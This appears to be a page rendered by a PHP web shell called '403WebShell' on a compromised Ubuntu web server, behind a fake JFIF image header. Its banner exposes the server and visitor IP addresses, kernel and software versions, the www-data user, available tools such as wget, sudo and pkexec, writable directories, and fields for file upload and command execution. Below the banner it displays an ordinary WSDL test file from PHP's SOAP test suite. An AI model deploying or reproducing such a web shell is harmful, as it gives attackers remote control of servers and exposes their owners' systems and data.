????JFIF??x?x????'403WebShell
403Webshell
Server IP : 79.136.114.73  /  Your IP : 18.188.27.20
Web Server : Apache/2.4.7 (Ubuntu) PHP/5.5.9-1ubuntu4.29 OpenSSL/1.0.1f
System : Linux b8009 3.13.0-170-generic #220-Ubuntu SMP Thu May 9 12:40:49 UTC 2019 x86_64
User : www-data ( 33)
PHP Version : 5.5.9-1ubuntu4.29
Disable Function : pcntl_alarm,pcntl_fork,pcntl_waitpid,pcntl_wait,pcntl_wifexited,pcntl_wifstopped,pcntl_wifsignaled,pcntl_wexitstatus,pcntl_wtermsig,pcntl_wstopsig,pcntl_signal,pcntl_signal_dispatch,pcntl_get_last_error,pcntl_strerror,pcntl_sigprocmask,pcntl_sigwaitinfo,pcntl_sigtimedwait,pcntl_exec,pcntl_getpriority,pcntl_setpriority,
MySQL : ON  |  cURL : ON  |  WGET : ON  |  Perl : ON  |  Python : ON  |  Sudo : ON  |  Pkexec : ON
Directory :  /proc/self/root/home/b8009/php-5.6.22/ext/soap/tests/bugs/

Upload File :
current_dir [ Writeable ] document_root [ Writeable ]

 

Command :


[ Back ]     

Current File : /proc/self/root/home/b8009/php-5.6.22/ext/soap/tests/bugs/bug42086.wsdl
<?xml version='1.0' encoding='UTF-8'?>

<!-- WSDL file generated by Zend Studio. -->

<definitions name="LBAService" targetNamespace="http://xml.avaya.com/ws/device-management/distributed-enterprise" xmlns:typens="http://xml.avaya.com/ws/device-management/distributed-enterprise" xmlns:xsd="http://www.w3.org/2001/XMLSchema" xmlns:soap="http://schemas.xmlsoap.org/wsdl/soap/" xmlns:soapenc="http://schemas.xmlsoap.org/soap/encoding/" xmlns:wsdl="http://schemas.xmlsoap.org/wsdl/" xmlns="http://schemas.xmlsoap.org/wsdl/">
	<types>
		<xsd:schema xmlns="http://www.w3.org/2001/XMLSchema" targetNamespace="http://xml.avaya.com/ws/device-management/distributed-enterprise">
			<xsd:complexType name="firstFunctionClassParam">
				<xsd:all>
					<xsd:element name="param" type="xsd:string"/>
					<xsd:element name="vectparam" type="xsd:string" minOccurs="0" maxOccurs="unbounded"/>
				</xsd:all>
			</xsd:complexType>
			<xsd:complexType name="firstFunctionClassParamResponse">
				<xsd:all>
					<xsd:element name="param" type="xsd:string"/>
				</xsd:all>
			</xsd:complexType>
			<xsd:complexType name="firstFunctionWithoutParamResponse">
				<xsd:all>
					<xsd:element name="param" type="xsd:string"/>
				</xsd:all>
			</xsd:complexType>
			<xsd:complexType name="secondFunctionClassParam">
				<xsd:all>
					<xsd:element name="param" type="xsd:string"/>
					<xsd:element name="vectparam" type="xsd:string" minOccurs="0" maxOccurs="unbounded"/>
				</xsd:all>
			</xsd:complexType>
			<xsd:complexType name="secondFunctionClassParamResponse">
				<xsd:all>
					<xsd:element name="param" type="xsd:string"/>
				</xsd:all>
			</xsd:complexType>
			<xsd:complexType name="secondFunctionWithoutParamResponse">
				<xsd:all>
					<xsd:element name="param" type="xsd:string"/>
				</xsd:all>
			</xsd:complexType>
		</xsd:schema>
	</types>
	<message name="firstFunctionClassParam">
		<part name="firstFunctionClassParam" type="typens:firstFunctionClassParam"/>
	</message>
	<message name="firstFunctionClassParamResponse">
		<part name="firstFunctionClassParamReturn" type="typens:firstFunctionClassParamResponse"/>
	</message>
	<message name="firstFunctionWithoutParam"/>
<!--
	<message name="firstFunctionWithoutParam">
		<part name="firstFunctionWithoutParam"/>
	</message>
-->
	<message name="firstFunctionWithoutParamResponse">
		<part name="firstFunctionWithoutParamReturn" type="typens:firstFunctionWithoutParamResponse"/>
	</message>
	<message name="secondFunctionClassParam">
		<part name="secondFunctionClassParam" type="typens:secondFunctionClassParam"/>
	</message>
	<message name="secondFunctionClassParamResponse">
		<part name="secondFunctionClassParamReturn" type="typens:secondFunctionClassParamResponse"/>
	</message>
	<message name="secondFunctionWithoutParam"/>
	<message name="secondFunctionWithoutParamResponse">
		<part name="secondFunctionWithoutParamReturn" type="typens:secondFunctionWithoutParamResponse"/>
	</message>
	<portType name="wsImpPortType">
		<operation name="firstFunctionClassParam">
			<documentation>
				Enter description here...
			</documentation>
			<input message="typens:firstFunctionClassParam"/>
			<output message="typens:firstFunctionClassParamResponse"/>
		</operation>
		<operation name="firstFunctionWithoutParam">
			<documentation>
				Enter description here...
			</documentation>
			<input message="typens:firstFunctionWithoutParam"/>
			<output message="typens:firstFunctionWithoutParamResponse"/>
		</operation>
		<operation name="secondFunctionClassParam">
			<documentation>
				Enter description here...
			</documentation>
			<input message="typens:secondFunctionClassParam"/>
			<output message="typens:secondFunctionClassParamResponse"/>
		</operation>
		<operation name="secondFunctionWithoutParam">
			<documentation>
				Enter description here...
			</documentation>
			<input message="typens:secondFunctionWithoutParam"/>
			<output message="typens:secondFunctionWithoutParamResponse"/>
		</operation>
	</portType>
	<binding name="wsImpBinding" type="typens:wsImpPortType">
		<soap:binding style="document" transport="http://schemas.xmlsoap.org/soap/http"/>
		<operation name="firstFunctionClassParam">
			<soap:operation soapAction="urn:wsImpAction"/>
			<input>
				<soap:body namespace="http://xml.avaya.com/ws/device-management/distributed-enterprise" use="literal"/>
			</input>
			<output>
				<soap:body namespace="http://xml.avaya.com/ws/device-management/distributed-enterprise" use="literal"/>
			</output>
		</operation>
		<operation name="firstFunctionWithoutParam">
			<soap:operation soapAction="urn:wsImpAction"/>
			<input>
				<soap:body namespace="http://xml.avaya.com/ws/device-management/distributed-enterprise" use="literal"/>
			</input>
			<output>
				<soap:body namespace="http://xml.avaya.com/ws/device-management/distributed-enterprise" use="literal"/>
			</output>
		</operation>
		<operation name="secondFunctionClassParam">
			<soap:operation soapAction="urn:wsImpAction"/>
			<input>
				<soap:body namespace="http://xml.avaya.com/ws/device-management/distributed-enterprise" use="literal"/>
			</input>
			<output>
				<soap:body namespace="http://xml.avaya.com/ws/device-management/distributed-enterprise" use="literal"/>
			</output>
		</operation>
		<operation name="secondFunctionWithoutParam">
			<soap:operation soapAction="urn:wsImpAction"/>
			<input>
				<soap:body namespace="http://xml.avaya.com/ws/device-management/distributed-enterprise" use="literal"/>
			</input>
			<output>
				<soap:body namespace="http://xml.avaya.com/ws/device-management/distributed-enterprise" use="literal"/>
			</output>
		</operation>
	</binding>
	<service name="LBAService">
		<port name="wsImpPort" binding="typens:wsImpBinding">
			<soap:address location="test://"/>
		</port>
	</service>
</definitions>

Youez - 2016 - github.com/yon3zu
LinuXploit